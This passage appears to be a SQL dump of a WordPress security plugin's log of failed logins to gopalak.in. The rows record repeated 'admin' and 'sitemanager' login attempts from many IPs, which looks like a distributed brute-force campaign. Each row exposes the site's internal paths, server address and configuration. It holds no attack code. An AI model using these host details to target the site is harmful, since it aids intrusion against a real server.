MIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745409434.9762909;s:12:\"REQUEST_TIME\";i:1745409434;}}','45.67.14.64',0,'2025-04-23 17:27:16','1970-01-01 00:00:00'),(93906,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36504\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745409800.345974;s:12:\"REQUEST_TIME\";i:1745409800;}}','68.65.122.90',0,'2025-04-23 17:33:21','1970-01-01 00:00:00'),(93907,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39448\";s:11:\"REMOTE_ADDR\";s:11:\"31.7.70.254\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745410160.89077;s:12:\"REQUEST_TIME\";i:1745410160;}}','31.7.70.254',0,'2025-04-23 17:39:22','1970-01-01 00:00:00'),(93908,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50144\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.145\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745410523.340179;s:12:\"REQUEST_TIME\";i:1745410523;}}','199.188.200.145',0,'2025-04-23 17:45:24','1970-01-01 00:00:00'),(93909,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39498\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745410885.0528669;s:12:\"REQUEST_TIME\";i:1745410885;}}','103.169.35.190',0,'2025-04-23 17:51:26','1970-01-01 00:00:00'),(93910,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52376\";s:11:\"REMOTE_ADDR\";s:15:\"198.186.130.214\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745411245.8453231;s:12:\"REQUEST_TIME\";i:1745411245;}}','198.186.130.214',0,'2025-04-23 17:57:27','1970-01-01 00:00:00'),(93911,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50220\";s:11:\"REMOTE_ADDR\";s:13:\"104.219.248.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745411610.7613361;s:12:\"REQUEST_TIME\";i:1745411610;}}','104.219.248.2',0,'2025-04-23 18:03:32','1970-01-01 00:00:00'),(93912,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60412\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745412342.1382079;s:12:\"REQUEST_TIME\";i:1745412342;}}','68.65.120.171',0,'2025-04-23 18:15:43','1970-01-01 00:00:00'),(93913,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59238\";s:11:\"REMOTE_ADDR\";s:12:\"68.66.220.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745412704.896641;s:12:\"REQUEST_TIME\";i:1745412704;}}','68.66.220.30',0,'2025-04-23 18:21:46','1970-01-01 00:00:00'),(93914,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49148\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.207.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745413066.3296261;s:12:\"REQUEST_TIME\";i:1745413066;}}','199.188.207.168',0,'2025-04-23 18:27:47','1970-01-01 00:00:00'),(93915,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34278\";s:11:\"REMOTE_ADDR\";s:14:\"185.222.163.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745413799.1467769;s:12:\"REQUEST_TIME\";i:1745413799;}}','185.222.163.90',0,'2025-04-23 18:40:00','1970-01-01 00:00:00'),(93916,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 